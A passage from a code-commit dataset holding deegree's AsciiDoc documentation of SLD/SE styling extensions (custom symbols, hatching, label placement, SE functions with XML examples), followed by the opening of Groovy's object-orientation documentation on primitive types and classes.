For several\nspecific extensions, there is a deegree SE XML\nhttp:\/\/schemas.deegree.org\/se[Schema].\n\n==== SLD\/SE extensions\n\n===== Use of alternative Symbols within the WellKnownName\n\nThe SLD\/SE specification defines a list of standard symbols, which are `circle`,\n`triangle`, `star`, `square` and `x`.\nIn addition to these standard symbols, other predefined and freely configurable\nsymbols are also available. These are described in the following chapters.\n\nFor reference, each symbol is shown with the following style.\n[source,xml]\n----\n<Fill>\n <SvgParameter name=\"fill\">#FF0000<\/SvgParameter>\n <SvgParameter name=\"fill-opacity\">0.4<\/SvgParameter>\n<\/Fill>\n<Stroke>\n <SvgParameter name=\"stroke\">#000000<\/SvgParameter>\n <SvgParameter name=\"stroke-width\">1<\/SvgParameter>\n<\/Stroke>\n----\n\n====== Predefined symbols\n\n[cols=\"3\"]\n.Standard Symbols defined by the SLD\/SE specification\n|===\na| image:se_wkn\/circle.png[] `circle`\na| image:se_wkn\/triangle.png[] `triangle`\na| image:se_wkn\/star.png[] `star`\na| image:se_wkn\/square.png[] `square`\na| image:se_wkn\/x.png[] `x`\n|\n|===\n\n[cols=\"3\"]\n.Extended Symbols `shape:\/\/`\n|===\na| image:se_wkn\/shape_backslash.png[] `shape:\/\/backslash`\na| image:se_wkn\/shape_carrow.png[] `shape:\/\/carrow`\na| image:se_wkn\/shape_ccarrow.png[] `shape:\/\/ccarrow`\n\na| image:se_wkn\/shape_coarrow.png[] `shape:\/\/coarrow`\na| image:se_wkn\/shape_dot.png[] `shape:\/\/dot`\na| image:se_wkn\/shape_horline.png[] `shape:\/\/horline`\n\na| image:se_wkn\/shape_oarrow.png[] `shape:\/\/oarrow`\na| image:se_wkn\/shape_plus.png[] `shape:\/\/plus`\na| image:se_wkn\/shape_slash.png[] `shape:\/\/slash`\n\na| image:se_wkn\/shape_times.png[] `shape:\/\/times`\na| image:se_wkn\/shape_vertline.png[] `shape:\/\/vertline`\n|\n|===\n\n[cols=\"30,30,40\"]\n.Extended Symbols `extshape:\/\/`\n|===\na| image:se_wkn\/extshape_arrow.png[] `extshape:\/\/arrow`\na| image:se_wkn\/extshape_emicircle.png[] `extshape:\/\/emicircle`\na| image:se_wkn\/extshape_narrow.png[] `extshape:\/\/narrow`\n\na| image:se_wkn\/extshape_sarrow.png[] `extshape:\/\/sarrow`\na| image:se_wkn\/extshape_triangle.png[] `extshape:\/\/triangle`\na| image:se_wkn\/extshape_triangleemicircle.png[] `extshape:\/\/triangleemicircle`\n|===\n\n[cols=\"3\"]\n.Extended Symbols `qgis:\/\/`\n|===\na| image:se_wkn\/qgis_arrow.png[] `qgis:\/\/arrow`\na| image:se_wkn\/qgis_arrowhead.png[] `qgis:\/\/arrowhead`\na| image:se_wkn\/qgis_circle.png[] `qgis:\/\/circle`\n\na| image:se_wkn\/qgis_cross.png[] `qgis:\/\/cross`\na| image:se_wkn\/qgis_cross2.png[] `qgis:\/\/cross2`\na| image:se_wkn\/qgis_crossfill.png[] `qgis:\/\/crossfill`\n\na| image:se_wkn\/qgis_diagonalhalfsquare.png[] `qgis:\/\/diagonalhalfsquare`\na| image:se_wkn\/qgis_diamond.png[] `qgis:\/\/diamond`\na| image:se_wkn\/qgis_equilateral_triangle.png[] `qgis:\/\/equilateral_triangle`\n\na| image:se_wkn\/qgis_filled_arrowhead.png[] `qgis:\/\/filled_arrowhead`\na| image:se_wkn\/qgis_halfsquare.png[] `qgis:\/\/halfsquare`\na| image:se_wkn\/qgis_hexagon.png[] `qgis:\/\/hexagon`\n\na| image:se_wkn\/qgis_lefthalftriangle.png[] `qgis:\/\/lefthalftriangle`\na| image:se_wkn\/qgis_line.png[] `qgis:\/\/line`\na| image:se_wkn\/qgis_pentagon.png[] `qgis:\/\/pentagon`\n\na| image:se_wkn\/qgis_quartercircle.png[] `qgis:\/\/quartercircle`\na| image:se_wkn\/qgis_quartersquare.png[] `qgis:\/\/quartersquare`\na| image:se_wkn\/qgis_rectangle.png[] `qgis:\/\/rectangle`\n\na| image:se_wkn\/qgis_regular_star.png[] `qgis:\/\/regular_star`\na| 
image:se_wkn\/qgis_righthalftriangle.png[] `qgis:\/\/righthalftriangle`\na| image:se_wkn\/qgis_semicircle.png[] `qgis:\/\/semicircle`\n\na| image:se_wkn\/qgis_star.png[] `qgis:\/\/star`\na| image:se_wkn\/qgis_thirdcircle.png[] `qgis:\/\/thirdcircle`\na| image:se_wkn\/qgis_triangle.png[] `qgis:\/\/triangle`\n|===\n\n====== Custom arrow with extshape:\/\/arrow\n\nThe symbol `extshape:\/\/arrow` can be adapted to your own needs with three optional parameters, which are:\n\n * `t`: thickness of the arrow base, in a value range between 0 and 1 with a default of 0.2\n * `hr`: height over width ratio, in a value range between 0 and 1000 with a default of 2\n * `ab`: arrow head base ratio, in a value range between 0 and 1 with a default of 0.5\n\n.Example of `extshape:\/\/arrow` which varies `ab` between `0.1` and `1.0`\nimage::se_wkn_example\/extshape_arrow_ab_01_10.png[]\n.Example of `extshape:\/\/arrow` which varies `hr` between `0.2` and `2.0`\nimage::se_wkn_example\/extshape_arrow_hr_02_20.png[]\n.Example of `extshape:\/\/arrow` which varies `t` between `0.1` and `1.0`\nimage::se_wkn_example\/extshape_arrow_t_00_10.png[]\n\n.Example\n[source,xml]\n----\n<WellKnownName>extshape:\/\/arrow?t=0.2&amp;hr=2&amp;ab=0.5<\/WellKnownName>\n----\n\n====== Custom Symbol from SVG path svgpath:\/\/\n\nIt is also possible to define a symbol from SVG path data.\nThe syntax of SVG path data is described at https:\/\/www.w3.org\/TR\/SVG\/paths.html#PathData\n\n.Example of a custom symbol with `svgpath:\/\/`\n[cols=\"10,90\"]\n|===\na|image::se_wkn_example\/svgpath_example.png[]\na|`svgpath:\/\/m 8,14 0,-6 h -4.5 c 0,0 0,-7.5 6.6,-7.5 6,0 6.5,7.5 6.6,7.5 l -4.5,0 0,6 z m -4,0 v -2 h 2 v 2 z`\n|===\n\n====== Use Symbol from character code ttf:\/\/\n\nTrueType font files can also be used as a source for symbols.\nFor TrueType fonts installed at System or Java level the syntax is `ttf:\/\/Font Name#code`.\nIf the font is not installed but available, it can be specified\nwith an absolute or relative path as `ttf:\/\/font.ttf#code`.\n\nThe character code has to be specified in hexadecimal notation prefixed with `0x`, `U+` or `\\u`.\n\n.Example of `ttf:\/\/` symbols\n[cols=\"10,30,10,50\"]\n|===\na| image::se_wkn_example\/ttf_lucida_sans.png[]\na| `ttf:\/\/Lucida Sans#0x21BB` +\n`ttf:\/\/Lucida Sans#U+21BB` +\n`ttf:\/\/Lucida Sans#\\u21bb`\na| image::se_wkn_example\/ttf_fontawesome_external.png[]\na| `ttf:\/\/..\/fontawesome-webfont.ttf#0xf13d`\n|===\n\nTIP: The character code for fonts installed at System level can be looked up\nvia the system Character Map application.\n\n====== Spacing around the symbol\n\nEach symbol except `circle`,\n`triangle`, `star`, `square` and `x` can be defined with an explicit bound.\nThis is particularly useful if you want to display an area fill with a symbol.\n\nThis explicit limit can be specified either as width and height or as the\nlower left and upper right corner.\n\nThe syntax is: `wellknownname[width,height]` or `wellknownname[minx,miny,maxx,maxy]`\n\n[cols=\"10,40,10,40\"]\n|===\na| image:se_wkn_example\/qgis_circle_hatch_default.png[]\na| Regular symbol `qgis:\/\/circle`\na| image:se_wkn_example\/qgis_circle_hatch_bounded.png[]\na| Symbol with explicit bounds `qgis:\/\/circle[-1,-1,3,2]`\n|===\n\nTIP: The width and height must be entered in the coordinate system of the symbol.\nMost symbols are defined around the zero point with a width of 1.0.\nAccordingly it is recommended to start with the values `[1,1]` or `[-0.5,-0.5,0.5,0.5]`.
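To make the effect concrete, the following sketch fills polygons with the bounded symbol from the table above (the fill color and size are illustrative, not prescribed by deegree):\n\n[source,xml]\n----\n<PolygonSymbolizer xmlns=\"http:\/\/www.opengis.net\/se\">\n <Fill>\n <GraphicFill>\n <Graphic>\n <Mark>\n <!-- explicit bounds add spacing around the repeated symbol -->\n <WellKnownName>qgis:\/\/circle[-1,-1,3,2]<\/WellKnownName>\n <Fill>\n <SvgParameter name=\"fill\">#000000<\/SvgParameter>\n <\/Fill>\n <\/Mark>\n <Size>10<\/Size>\n <\/Graphic>\n <\/GraphicFill>\n <\/Fill>\n<\/PolygonSymbolizer>\n----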
===== Simplified hatches\n\nTo make hatching configuration easier, a new function `HatchingDistance` has been added,\nwhich allows the user to define the size by specifying the hatching angle and desired line spacing.\n\nThe first parameter is the hatching angle, the second is the line spacing in the unit of the symbolizer.\n\n.Example hatches\n[cols=\"10a,15,25,10a,15,25\",options=\"header\"]\n|===\n| | Rotation | WellKnownName | | Rotation | WellKnownName\n| image:se_wkn_example\/hatch_slash.png[] | 0 | `shape:\/\/slash`\n| image:se_wkn_example\/hatch_backslash.png[] | 0 | `shape:\/\/backslash`\n| image:se_wkn_example\/hatch_times.png[] | 0 | `shape:\/\/times`\n| image:se_wkn_example\/hatch_10deg.png[] | 10 | `shape:\/\/vertline`\n|===\n.Symbolizer used in previous example\n[source,xml]\n----\n<!-- PolygonSymbolizer for outline omitted -->\n<PolygonSymbolizer uom=\"http:\/\/www.opengeospatial.org\/se\/units\/pixel\" xmlns=\"http:\/\/www.opengis.net\/se\">\n <Fill>\n <GraphicFill>\n <Graphic>\n <Mark>\n <WellKnownName>shape:\/\/slash<\/WellKnownName>\n <Stroke>\n <SvgParameter name=\"stroke\">#000000<\/SvgParameter>\n <SvgParameter name=\"stroke-width\">1<\/SvgParameter>\n <SvgParameter name=\"stroke-linecap\">butt<\/SvgParameter>\n <\/Stroke>\n <\/Mark>\n <Size>\n <ogc:Function name=\"HatchingDistance\">\n <ogc:Literal>45<\/ogc:Literal>\n <ogc:Literal>10<\/ogc:Literal>\n <\/ogc:Function>\n <\/Size>\n <Rotation>0<\/Rotation>\n <\/Graphic>\n <\/GraphicFill>\n <\/Fill>\n<\/PolygonSymbolizer>\n----\nTIP: For off-the-shelf hatches which will create nice results, use the mark symbol `shape:\/\/slash`, `shape:\/\/backslash`\nor `shape:\/\/times` for 45\u00b0, `shape:\/\/horline` for 0\u00b0 and `shape:\/\/vertline` for 90\u00b0 hatches.\nFor hatching with user-defined angles it is recommended to use `shape:\/\/vertline`.\n\nTIP: With user-defined distances or angles that are not divisible by 45, rounding inaccuracies may occur and become\nvisible in the results depending on the used styles.\n\nTIP: To get an even hatching we recommend setting the parameter `stroke-linecap` to `butt`.\nThis is especially recommended for transparent hatches.\n\n===== Use of TTF files as Mark symbols\n\nYou can use TrueType font files to use custom vector symbols in a\n_Mark_ element:\n\n[source,xml]\n----\n<Mark>\n <OnlineResource xlink:href=\"filepath\/yousans.ttf\" \/>\n <Format>ttf<\/Format>\n <MarkIndex>99<\/MarkIndex>\n <Fill>\n <SvgParameter name=\"fill\">#000000<\/SvgParameter>\n ...\n <\/Fill>\n <Stroke>\n <SvgParameter name=\"stroke-opacity\">0<\/SvgParameter>\n ...\n <\/Stroke>\n<\/Mark>\n----\n\nTo find out what index you need to access, have a look at this\nhttp:\/\/osgeo-org.1560.n6.nabble.com\/SE-Styling-MarkIndex-glyph-index-tt5022210.html#a5026571[post]\non the mailing list which explains it very well.\n\n===== Label AutoPlacement\n\ndeegree has an option for SE LabelPlacement to automatically place\nlabels on the map. To enable AutoPlacement, you can simply set the\n\"auto\" attribute to \"true\".\n\n[source,xml]\n----\n<LabelPlacement>\n <PointPlacement auto=\"true\">\n <Displacement>\n <DisplacementX>0<\/DisplacementX>\n <DisplacementY>0<\/DisplacementY>\n <\/Displacement>\n <Rotation>0<\/Rotation>\n <\/PointPlacement>\n<\/LabelPlacement> \n----\n\nTIP: AutoPlacement for labels only works for PointPlacement. AutoPlacement\nfor LinePlacement is not implemented yet.
===== LinePlacement extensions\n\nThere are additional deegree specific LinePlacement parameters available\nto enable more sophisticated text rendering along lines:\n\n[width=\"100%\",cols=\"23%,11%,8%,58%\",options=\"header\",]\n|===\n|Option |Value |Default |Description\n|PreventUpsideDown |Boolean |false |Avoids upside down placement of text\n\n|Center |Boolean |false |Places the text in the center of the line\n\n|WordWise |Boolean |true |Tries to place individual words instead of\nindividual characters\n|===\n\n[source,xml]\n----\n<LinePlacement>\n <IsRepeated>false<\/IsRepeated>\n <InitialGap>10<\/InitialGap>\n <PreventUpsideDown>true<\/PreventUpsideDown>\n <Center>true<\/Center>\n <WordWise>false<\/WordWise>\n<\/LinePlacement>\n----\n\n===== ExternalGraphic extensions\n\ndeegree extends the OnlineResource element of ExternalGraphics to\nsupport ogc:Expressions as child elements. Example:\n\n[source,xml]\n----\n<ExternalGraphic>\n <OnlineResource>\n <ogc:PropertyName>app:icon<\/ogc:PropertyName>\n <\/OnlineResource>\n <Format>image\/svg<\/Format>\n<\/ExternalGraphic> \n----\n\n===== GraphicStroke extensions\n\nBy default, a _GraphicStroke_ is drawn repeatedly, but it can also be\ndrawn only once if the parameter `deegree-graphicstroke-position-percentage`\nis defined as a percentage of the line length.\nThe parameter `deegree-graphicstroke-rotation` controls whether the\n_Graphic_ is rotated to follow the angle of the current line segment\nor not; values larger than zero enable this. If not specified, the\n_Graphic_ will follow the angle of the line.\n\n*Rendering of Mark along a geometry*\n\nWhen deegree renders strokes with _Mark_ it will use the _Fill_ and\n_Stroke_ which are defined as sub-elements of _Mark_ instead of the\nparameters for `color`, `line-width` and `opacity` of _Stroke_.\nIf the _Fill_ or _Stroke_ of a _Mark_ should be omitted, this can be\nrealized by setting the corresponding `...-opacity` to zero. Example:\n\n[source,xml]\n----\n<Stroke>\n <GraphicStroke>\n <Graphic>\n <Mark>\n <WellKnownName>triangle<\/WellKnownName>\n <Fill>\n <SvgParameter name=\"fill-opacity\">0<\/SvgParameter>\n <\/Fill>\n <Stroke>\n <SvgParameter name=\"stroke-opacity\">0<\/SvgParameter>\n <\/Stroke>\n <\/Mark>\n <Size>20<\/Size>\n <\/Graphic>\n <\/GraphicStroke>\n <SvgParameter name=\"deegree-graphicstroke-position-percentage\">50<\/SvgParameter>\n <SvgParameter name=\"deegree-graphicstroke-rotation\">0<\/SvgParameter>\n<\/Stroke>\n----\n\nNOTE: A typical usage is to draw an arrowhead on a line. This can be\nachieved by using a filled `triangle` _Mark_ which is rotated 90 degrees\nto the left (`-90`) with an anchor point of `0.75` \/ `0.5` and\n`deegree-graphicstroke-position-percentage` of `0` for the beginning\nof a line. To draw it at the end of a line, the _Mark_ has to be rotated\n90 degrees to the right (`90`) with an anchor point of `0.25` \/ `0.5`\nand `deegree-graphicstroke-position-percentage` of `100`.
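The following sketch spells out the line-start variant of that recipe (the size and color are illustrative; the rotation, anchor point and position percentage follow the note above):\n\n[source,xml]\n----\n<Stroke>\n <GraphicStroke>\n <Graphic>\n <Mark>\n <WellKnownName>triangle<\/WellKnownName>\n <Fill>\n <SvgParameter name=\"fill\">#000000<\/SvgParameter>\n <\/Fill>\n <\/Mark>\n <Size>20<\/Size>\n <!-- rotate 90 degrees to the left so the triangle points along the line -->\n <Rotation>-90<\/Rotation>\n <AnchorPoint>\n <AnchorPointX>0.75<\/AnchorPointX>\n <AnchorPointY>0.5<\/AnchorPointY>\n <\/AnchorPoint>\n <\/Graphic>\n <\/GraphicStroke>\n <!-- 0 = draw the graphic once, at the beginning of the line -->\n <SvgParameter name=\"deegree-graphicstroke-position-percentage\">0<\/SvgParameter>\n<\/Stroke>\n----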
*Rendering of images or SVGs along a geometry*\n\nBoth images and SVGs can be drawn along a geometry, but it should be\nnoted that these are best suited for signatures that are drawn only\nonce or with some gap.\nExample of a single SVG at the middle of the line:\n\n[source,xml]\n----\n<Stroke>\n <GraphicStroke>\n <Graphic>\n <ExternalGraphic>\n <OnlineResource xlink:href=\".\/sample.svg\" \/>\n <Format>svg<\/Format>\n <\/ExternalGraphic>\n <Size>20<\/Size>\n <\/Graphic>\n <\/GraphicStroke>\n <SvgParameter name=\"deegree-graphicstroke-position-percentage\">50<\/SvgParameter>\n<\/Stroke>\n----\n\n*Rendering of SVGs as Mark*\n\nTo draw only the outline or fill of an SVG with a single color, an SVG\ncan be used as a `Mark`. Example:\n\n[source,xml]\n----\n<Stroke>\n <GraphicStroke>\n <Graphic>\n <Mark>\n <OnlineResource xlink:href=\".\/sample.svg\" \/>\n <Format>svg<\/Format>\n <Fill>\n <SvgParameter name=\"fill\">#FF0000<\/SvgParameter>\n <\/Fill>\n <Stroke>\n <SvgParameter name=\"stroke-opacity\">0.0<\/SvgParameter>\n <\/Stroke>\n <\/Mark>\n <Size>20<\/Size>\n <\/Graphic>\n <\/GraphicStroke>\n<\/Stroke>\n----\n\nNOTE: Previous versions would have rendered an SVG defined in a\n`Graphic`\/`ExternalGraphic`\/`OnlineResource` like the `Mark` example above.\nSuch configurations either have to be converted to\n`Graphic`\/`Mark`\/`OnlineResource`, or the option to not render SVGs like\nimages has to be set for the instance; see <<anchor-appendix>> for details.\n\n==== SE & FE Functions\n\nThere are a couple of deegree specific functions which can be expressed\nas standard OGC function expressions in SLD\/SE. Additionally, deegree\nsupports all the functions defined within the SE standard.\n\n===== FormatNumber\n\nThis function is needed to format number attributes. It can be used like\nin the following example:
It can be used like\nin the following example:\n\n[source,xml]\n----\n<FormatNumber xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"\">\n <NumericValue>\n <ogc:PropertyName>app:SHAPE_LEN<\/ogc:PropertyName>\n <\/NumericValue>\n <Pattern>############.00<\/Pattern>\n<\/FormatNumber>\n----\n\n===== FormatDate\n\nThis function is fully supported, although not fully tested with all\navailable schema types mentioned in the spec.\n\n[source,xml]\n----\n<FormatDate xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"\">\n <DateValue>\n <ogc:PropertyName>app:TIMESTAMP<\/ogc:PropertyName>\n <\/DateValue>\n <Pattern>DD<\/Pattern>\n<\/FormatDate>\n----\n\n===== ChangeCase\n\nThis function is used to change the case of property values.\n\n[source,xml]\n----\n<ChangeCase xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"\" direction=\"toUpper\">\n <StringValue>\n <ogc:PropertyName>app:text<\/ogc:PropertyName>\n <\/StringValue>\n<\/ChangeCase>\n----\n\n===== Concatenate\n\nWith the concatenate function it is possible to merge the values of more\nthan one property to a chain.\n\n[source,xml]\n----\n<Concatenate xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"\">\n <StringValue>\n <ogc:PropertyName>app:text1<\/ogc:PropertyName>\n <\/StringValue>\n <StringValue>\n <ogc:PropertyName>app:text2<\/ogc:PropertyName>\n <\/StringValue>\n <StringValue>\n <ogc:PropertyName>app:text3<\/ogc:PropertyName>\n <\/StringValue>\n<\/Concatenate>\n----\n\n===== Trim\n\nThe trim function is used to trim string property values.\n\n[source,xml]\n----\n<Trim xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"\" stripOffPosition=\"both\">\n <StringValue>\n <ogc:PropertyName>app:text<\/ogc:PropertyName>\n <\/StringValue>\n<\/Trim>\n----\n\n===== StringLength\n\nWith the StringLength function it is possible to calculate the length of\nstring property values.\n\n[source,xml]\n----\n<StringLength xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"\">\n <StringValue>\n <ogc:PropertyName>app:text<\/ogc:PropertyName>\n <\/StringValue>\n<\/StringLength>\n----\n\n===== Substring\n\nWith the substring function it is possible to only get a specific\nsubstring of a string property.\n\n[source,xml]\n----\n<Substring xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"\">\n <StringValue>\n <ogc:PropertyName>app:text<\/ogc:PropertyName>\n <\/StringValue>\n <Position>1<\/Position>\n <Length>\n <ogc:Sub>\n <StringPosition fallbackValue=\"\" searchDirection=\"frontToBack\">\n <LookupString>-<\/LookupString>\n <StringValue>\n <ogc:PropertyName>app:text<\/ogc:PropertyName>\n <\/StringValue>\n <\/StringPosition>\n <ogc:Literal>1<\/ogc:Literal>\n <\/ogc:Sub>\n <\/Length>\n<\/Substring>\n----\n\n===== StringPosition\n\nThe StringPosition function is made to get the literal at a specific\nposition from a string property.\n\n[source,xml]\n----\n<StringPosition xmlns:app=\"http:\/\/www.deegree.org\/app\" 
xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"\" searchDirection=\"frontToBack\">\n <LookupString>-<\/LookupString>\n <StringValue>\n <ogc:PropertyName xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\">app:text<\/ogc:PropertyName>\n <\/StringValue>\n<\/StringPosition>\n----\n\n===== Categorize, Interpolate, Recode\n\nThese functions can operate both on alphanumeric properties of features\nand on raster data. For color values we extended the syntax a bit to\nallow for an alpha channel: #99ff0000 is a red value with an alpha value\nof 0x99. This allows the user to create eg. an interpolation from\ncompletely transparent to a completely opaque color value. To work on\nraster data you'll have to replace the PropertyName values with\nRasterdata.\n\nFor Interpolate only linear interpolation is currently supported.\n\n[source,xml]\n----\n<Categorize xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" fallbackValue=\"#fefdC3\">\n <LookupValue>\n <ogc:PropertyName>app:POP2000<\/ogc:PropertyName>\n <\/LookupValue>\n <Value>#FFE9D8<\/Value>\n <Threshold>1000<\/Threshold>\n <Value>#FBCFAC<\/Value>\n <Threshold>10000<\/Threshold>\n <Value>#FAAC6F<\/Value>\n <Threshold>25000<\/Threshold>\n <Value>#FD913D<\/Value>\n <Threshold>100000<\/Threshold>\n <Value>#FF7000<\/Value>\n<\/Categorize>\n----\n\n[source,xml]\n----\n<Interpolate xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"#005C29\" method=\"color\">\n <LookupValue>\n <ogc:PropertyName>app:CODE<\/ogc:PropertyName>\n <\/LookupValue>\n <InterpolationPoint>\n <Data>-1<\/Data>\n <Value>#005C29<\/Value>\n <\/InterpolationPoint>\n <InterpolationPoint>\n <Data>100<\/Data>\n <Value>#067A3A<\/Value>\n <\/InterpolationPoint>\n <InterpolationPoint>\n <Data>300<\/Data>\n <Value>#03A64C<\/Value>\n <\/InterpolationPoint>\n <InterpolationPoint>\n <Data>500<\/Data>\n <Value>#00CF5D<\/Value>\n <\/InterpolationPoint>\n <InterpolationPoint>\n <Data>1000<\/Data>\n <Value>#ffffff<\/Value>\n <\/InterpolationPoint>\n<\/Interpolate>\n----\n\n[source,xml]\n----\n<Recode xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"\">\n <LookupValue>\n<ogc:PropertyName>app:code<\/ogc:PropertyName>\n <\/LookupValue>\n <MapItem>\n <Data>1000<\/Data>\n <Value>water<\/Value>\n <\/MapItem>\n <MapItem>\n <Data>2000<\/Data>\n <Value>nuclear<\/Value>\n <\/MapItem>\n <MapItem>\n <Data>3000<\/Data>\n <Value>solar<\/Value>\n <\/MapItem>\n <MapItem>\n <Data>4000<\/Data>\n <Value>wind<\/Value>\n <\/MapItem>\n<\/Recode>\n----\n\n===== General XPath functions\n\nMany useful things can be done by simply using standard XPath 1.0\nfunctions in PropertyName elements.\n\nAccess the (local) name of an element (e.g. 
the name of a referenced\nfeature \/ subfeature).\n\n[source,xml]\n----\n<PropertyName xmlns:app=\"http:\/\/www.deegree.org\/app\">app:subfeature\/*\/local-name()<\/PropertyName>\n----\n","returncode":0,"stderr":"","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"50f49f569001f23ebdee4d3c8f539e9c4ead5c38","subject":"clarify documentation around properties (closes #642)","message":"clarify documentation around properties (closes #642)\n","repos":"jwagenleitner\/incubator-groovy,jwagenleitner\/groovy,russel\/groovy,paulk-asert\/incubator-groovy,armsargis\/groovy,traneHead\/groovy-core,paulk-asert\/incubator-groovy,apache\/groovy,paulk-asert\/incubator-groovy,shils\/incubator-groovy,apache\/incubator-groovy,jwagenleitner\/incubator-groovy,russel\/groovy,jwagenleitner\/incubator-groovy,traneHead\/groovy-core,russel\/incubator-groovy,shils\/incubator-groovy,apache\/groovy,shils\/incubator-groovy,paulk-asert\/groovy,paulk-asert\/groovy,russel\/incubator-groovy,armsargis\/groovy,shils\/groovy,shils\/incubator-groovy,jwagenleitner\/incubator-groovy,russel\/groovy,paulk-asert\/incubator-groovy,shils\/groovy,paulk-asert\/groovy,apache\/incubator-groovy,apache\/groovy,russel\/groovy,paulk-asert\/groovy,russel\/incubator-groovy,jwagenleitner\/groovy,apache\/incubator-groovy,paulk-asert\/incubator-groovy,jwagenleitner\/groovy,traneHead\/groovy-core,shils\/groovy,russel\/incubator-groovy,apache\/incubator-groovy,armsargis\/groovy,apache\/groovy,traneHead\/groovy-core,jwagenleitner\/groovy,shils\/groovy,armsargis\/groovy","old_file":"src\/spec\/doc\/core-object-orientation.adoc","new_file":"src\/spec\/doc\/core-object-orientation.adoc","new_contents":"\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n Licensed to the Apache Software Foundation (ASF) under one\n or more contributor license agreements. See the NOTICE file\n distributed with this work for additional information\n regarding copyright ownership. The ASF licenses this file\n to you under the Apache License, Version 2.0 (the\n \"License\"); you may not use this file except in compliance\n with the License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing,\n software distributed under the License is distributed on an\n \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n KIND, either express or implied. See the License for the\n specific language governing permissions and limitations\n under the License.\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n= Object orientation\n:jls: http:\/\/docs.oracle.com\/javase\/specs\/jls\/se8\/html\/\n\nThis chapter covers the object orientation of the Groovy programming language.\n\n== Types\n\n=== Primitive types\n\nGroovy supports the same primitive types as those defined by the {jls}[Java Language Specification]:\n\n* integral types: `byte` (8 bit), `short` (16 bit), `int` (32 bit) and `long` (64 bit)\n* floating-point types: `float` (32 bit) and `double` (64 bit)\n* `boolean` type (exactly `true` or `false`)\n* `char` type (16 bit, usable as a numeric type, representing an UTF-16 code)\n\nWhile Groovy declares and stores primitive fields and variables as primitives, because it uses Objects for\neverything, it autowraps references to primitives. 
Just like Java, the wrappers it uses are\n\n[cols=\"1,1\" options=\"header\"]\n.primitive wrappers\n|====\n| Primitive type\n| Wrapper class\n\n| boolean\n| Boolean\n\n| char\n| Character\n\n| short\n| Short\n\n| int\n| Integer\n\n| long\n| Long\n\n| float\n| Float\n\n| double\n| Double\n|====\n\nHere's an example using `int`\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/PrimitiveTest.groovy[tags=primitive_references,indent=0]\n----\n\nNow you may be concerned that this means every time you use a mathematical operator on a reference to a primitive\nthat you'll incur the cost of unboxing and reboxing the primitive. But this is not the case, as Groovy will compile\nyour operators into their link:core-operators.html#_operator-overloading[method equivalents] and use those instead.\nAdditionally, Groovy will automatically unbox to a primitive when calling a Java method that takes a primitive\nparameter and automatically box primitive method return values from Java. However, be aware there are some\nlink:core-differences-java.html#_primitives_and_wrappers[differences] from Java's method resolution.\n\n=== Class\n\nGroovy classes are very similar to Java classes, and are compatible with Java ones at the JVM level.\nThey may have methods, fields and properties (think JavaBean properties but with less boilerplate).\nClasses and class members can have the same modifiers (public, protected, private, static, etc.) as in Java\nwith some minor differences at the source level which are explained shortly.\n\nThe key differences between Groovy classes and their Java counterparts are:\n\n* Classes or methods with no visibility modifier are automatically public (a special annotation can be used to achieve package private visibility).\n* Fields with no visibility modifier are turned into properties automatically, which results in less verbose code,\nsince explicit getter and setter methods aren't needed. More on this aspect will be covered in the <<fields,fields and properties section>>.\n* Classes do not need to have the same base name as their source file definitions but it is highly recommended in most scenarios (see also the next point about scripts).\n* One source file may contain one or more classes (but if a file contains any code not in a class, it is considered a script). Scripts are just classes with some\nspecial conventions and will have the same name as their source file (so don't include a class definition within a script having the same name as the script source file).\n\nThe following code presents an example class.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=class_definition,indent=0]\n----\n<1> class beginning, with the name `Person`\n<2> string field and property named `name`\n<3> method definition\n\n\n==== Normal class\n\nNormal classes refer to classes which are top level and concrete. This means they can be instantiated without restrictions from any other classes or scripts. This way, they can only be public (even though the `public` keyword may be suppressed). Classes are instantiated by calling their constructors, using the `new` keyword, as in the following snippet.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=class_instantiation,indent=0]\n----\n\n\n==== Inner class\n\nInner classes are defined within another class. The enclosing class can use the inner class as usual. On the other hand, an inner class can access members of its enclosing class, even if they are private. 
